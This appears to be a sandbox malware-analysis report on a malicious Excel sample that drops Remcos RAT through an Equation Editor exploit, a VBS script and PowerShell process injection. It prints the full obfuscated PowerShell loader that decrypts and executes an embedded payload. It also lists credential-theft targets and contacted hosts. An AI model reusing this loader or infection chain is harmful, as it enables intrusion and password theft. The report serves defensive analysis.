            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00412077 GetProcessHeap,HeapFree,12_2_00412077
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00434B47 SetUnhandledExceptionFilter,12_2_00434B47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043BB22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434FDC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Injects a PE file into a foreign processes
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_004120F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00419627 mouse_event,12_2_00419627
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni68766530954276373206247047974663cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cnidslzbgrjpnz/qocg/lh2azhz5jl+3cjsg1p/+zzqrclxm6erqs615j4odskigveu9u0hkzwe2qlrhn3w3opnp9d3zrr0bjwddoahuyflsijmtaivmvqnjehi75gyn/731w2sw2lx9repuu8muzzbpukpdjjp40wnuy5rxupjozqj2ijhllwplewavlyyam2ryxj+az147db0x48wxphj1wzixorwhgaboawwaslahl3gmvyt1axv7fbfes5qqtebxgfvlhl4iuznyv88w0lkeiougnbeqfkzf13dc0iby1tfcgdbd33i0q+w2tvg+5qcsydt39hgqc+cpqjw6i+zs5pdayxmrwfx6shzxh4wqvwv1psllbl05m+vuyyzdwhee1jjzk1iypj679fiitnjuqbp5xka/o9mfqdn8rr6+t3w5uz8/qzmhx1mvroeqqe9sfqxrdm4xzld6zm0xvtyxdiptorir9y56wywilgvowzc7rtlcr5vnoqsqcez+tbuh3i8j+drjxqv5li4wpy7xjzfyzpapmswdqejc1bmnxhvq0ukf2im7ffm7k6nze4qwdaby3eaeqabrjji8e0i57j7cmed36tsjyhf0u03e/7/3gwxhiosnvfstql9ychnne0mcqphtsif3pxt9ee9ulz//7yh3sp7zqked24zy6bopjqu9ryt/0qhb2cgoa9ddgikpiavuisszwbmmvp3wzazgxn3nbcy0pstnp16fjfpslfxhda3ns1dtwajq0lidem77ug2ki38ej/rruke9qgo+fuhe0xcht8/wf5nvyoxrcasifgam2a+woxlafenmbr8szgcpcgnpzl/ngn6ossardn26lo+fp2jr2c/5yc3mcao0ld51wdewkzwp8b1w57wqs7gmmfayz4qaxwbt0dpwxcdt4ldwrwotfjthkkrsrb29mx+zsitgjd4zwlyp4xgkn+mdlt0rpmqdazm0hkrfyo5dxlrzhslsw0xcn3euxi+4932vgm0qse+1k4quce5wqthb1zojkshclz3bmuvcdowmedkxuqxkg7dtjdx8uvansaeltrbqenfoyu9ewmyi9lzkr9oznps+cohzr5jhq9hpvtmcsoldartighzy80sqmosagvigdyoyjgpnwduzlldye8nyqdaajuhcq27lhvzkyqvajhd3kdvjqboif1lyyay52jn1dhnhxgk0nluzd0ilxehvzphlaveococd50uqj+q1kgxn7gs2k+zoaxgamsw9oubovylc2v04rd098/as2deb2//qhwxg3f0c50kqyp4qow398pqnbg4m4pjz0uidlflekkdinqrkxq/drvpvbwz7wrubde9f6yxo/vtkm0dgir+udwiy0ewc9hpu+mklp45fqh0pc7vys3chou8e4fmalluve4yfg==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni68766530954276373206247047974663cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cnidslzbgrjpnz/qocg/lh2azhz5jl+3cjsg1p/+zzqrclxm6erqs615j4odskigveu9u0hkzwe2qlrhn3w3opnp9d3zrr0bjwddoahuyflsijmtaivmvqnjehi75gyn/731w2sw2lx9repuu8muzzbpukpdjjp40wnuy5rxupjozqj2ijhllwplewavlyyam2ryxj+az147db0x48wxphj1wzixorwhgaboawwaslahl3gmvyt1axv7fbfes5qqtebxgfvlhl4iuznyv88w0lkeiougnbeqfkzf13dc0iby1tfcgdbd33i0q+w2tvg+5qcsydt39hgqc+cpqjw6i+zs5pdayxmrwfx6shzxh4wqvwv1psllbl05m+vuyyzdwhee1jjzk1iypj679fiitnjuqbp5xka/o9mfqdn8rr6+t3w5uz8/qzmhx1mvroeqqe9sfqxrdm4xzld6zm0xvtyxdiptorir9y56wywilgvowzc7rtlcr5vnoqsqcez+tbuh3i8j+drjxqv5li4wpy7xjzfyzpapmswdqejc1bmnxhvq0ukf2im7ffm7k6nze4qwdaby3eaeqabrjji8e0i57j7cmed36tsjyhf0u03e/7/3gwxhiosnvfstql9ychnne0mcqphtsif3pxt9ee9ulz//7yh3sp7zqked24zy6bopjqu9ryt/0qhb2cgoa9ddgikpiavuisszwbmmvp3wzazgxn3nbcy0pstnp16fjfpslfxhda3ns1dtwajq0lidem77ug2ki38ej/rruke9qgo+fuhe0xcht8/wf5nvyoxrcasifgam2a+woxlafenmbr8szgcpcgnpzl/ngn6ossardn26lo+fp2jr2c/5yc3mcao0ld51wdewkzwp8b1w57wqs7gmmfayz4qaxwbt0dpwxcdt4ldwrwotfjthkkrsrb29mx+zsitgjd4zwlyp4xgkn+mdlt0rpmqdazm0hkrfyo5dxlrzhslsw0xcn3euxi+4932vgm0qse+1k4quce5wqthb1zojkshclz3bmuvcdowmedkxuqxkg7dtjdx8uvansaeltrbqenfoyu9ewmyi9lzkr9oznps+cohzr5jhq9hpvtmcsoldartighzy80sqmosagvigdyoyjgpnwduzlldye8nyqdaajuhcq27lhvzkyqvajhd3kdvjqboif1lyyay52jn1dhnhxgk0nluzd0ilxehvzphlaveococd50uqj+q1kgxn7gs2k+zoaxgamsw9oubovylc2v04rd098/as2deb2//qhwxg3f0c50kqyp4qow398pqnbg4m4pjz0uidlflekkdinqrkxq/drvpvbwz7wrubde9f6yxo/vtkm0dgir+udwiy0ewc9hpu+mklp45fqh0pc7vys3chou8e4fmalluve4yfg==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crepJump to behavior
            Source: RegAsm.exe, 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChromelity Mode] - Microsoft Word
            Source: RegAsm.exe, 0000000C.00000002.1053847847.0000000000532000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager":200,
            Source: RegAsm.exe, 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: RegAsm.exe, 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, nots.dat.12.drBinary or memory string: [Program Manager]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00434C52 cpuid 12_2_00434C52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,12_2_00452036
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_004520C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,12_2_00452313
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,12_2_00448404
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_0045243C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,12_2_00452543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00452610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,12_2_0040F8D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,12_2_004488ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,12_2_00451CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,12_2_00451F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,12_2_00451F9B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00448957 GetSystemTimeAsFileTime,12_2_00448957
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041B60D GetUserNameW,12_2_0041B60D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00449190
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Contains functionality to steal Chrome passwords or cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040BA12
            Contains functionality to steal Firefox passwords or cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db12_2_0040BB30

            Remote Access Functionality

            barindex
            Detected Remcos RAT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-999Z97Jump to behavior
            Yara detected Remcos RAT
            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe12_2_0040569A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information131
            Scripting            		Valid Accounts1
            Native API            		131
            Scripting            		1
            DLL Side-Loading            		11
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services11
            Archive Collected Data            		15
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts43
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            Bypass User Account Control            		21
            Obfuscated Files or Information            		211
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol211
            Input Capture            		2
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts221
            Command and Scripting Interpreter            		1
            Windows Service            		1
            Access Token Manipulation            		1
            DLL Side-Loading            		2
            Credentials In Files            		1
            System Service Discovery            		SMB/Windows Admin Shares3
            Clipboard Data            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            Service Execution            		Login Hook1
            Windows Service            		1
            Bypass User Account Control            		NTDS3
            File and Directory Discovery            		Distributed Component Object ModelInput Capture1
            Remote Access Software            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts2
            PowerShell            		Network Logon Script222
            Process Injection            		1
            Masquerading            		LSA Secrets34
            System Information Discovery            		SSHKeylogging3
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
            Virtualization/Sandbox Evasion            		Cached Domain Credentials2
            Security Software Discovery            		VNCGUI Input Capture213
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync21
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
            Process Injection            		Proc Filesystem3
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            Remote System Discovery            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482975 Sample: AWD 490104998518.xls Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 52 tny.wtf 2->52 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Antivirus detection for URL or domain 2->70 72 21 other signatures 2->72 9 EXCEL.EXE 57 41 2->9         started        signatures3 process4 dnsIp5 56 tny.wtf 188.114.96.3, 49165, 49168, 80 CLOUDFLARENETUS European Union 9->56 58 192.3.176.174, 49166, 49170, 49172 AS-COLOCROSSINGUS United States 9->58 42 C:\Users\user\...\AWD 490104998518.xls (copy), Composite 9->42 dropped 44 creamthingstohappe...ingstobeback[1].doc, Rich 9->44 dropped 13 wscript.exe 1 9->13         started        16 WINWORD.EXE 336 37 9->16         started        file6 process7 dnsIp8 84 Suspicious powershell command line found 13->84 86 Wscript starts Powershell (via cmd or directly) 13->86 88 Obfuscated command line found 13->88 96 3 other signatures 13->96 20 powershell.exe 12 5 13->20         started        48 tny.wtf 16->48 50 188.114.97.3, 49167, 49169, 80 CLOUDFLARENETUS European Union 16->50 32 C:\Users\user\AppData\Roaming\...\tny.wtf.url, MS 16->32 dropped 34 C:\Users\user\AppData\Roaming\...\sA.url, MS 16->34 dropped 36 ~WRF{2F215D8E-00CF...A-7B89408264B1}.tmp, Composite 16->36 dropped 38 C:\Users\user\AppData\Local\...\D09A9DB5.doc, Rich 16->38 dropped 90 Microsoft Office launches external ms-search protocol handler (WebDAV) 16->90 92 Office viewer loads remote template 16->92 94 Microsoft Office drops suspicious files 16->94 24 EQNEDT32.EXE 12 16->24         started        file9 signatures10 process11 dnsIp12 54 198.46.176.133, 49171, 80 AS-COLOCROSSINGUS United States 20->54 74 Writes to foreign memory regions 20->74 76 Suspicious execution chain found 20->76 78 Injects a PE file into a foreign processes 20->78 27 RegAsm.exe 3 13 20->27         started        40 C:\Users\...\creatednewwaterbottleform.vBS, Unicode 24->40 dropped 80 Office equation editor establishes network connection 24->80 82 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 24->82 file13 signatures14 process15 dnsIp16 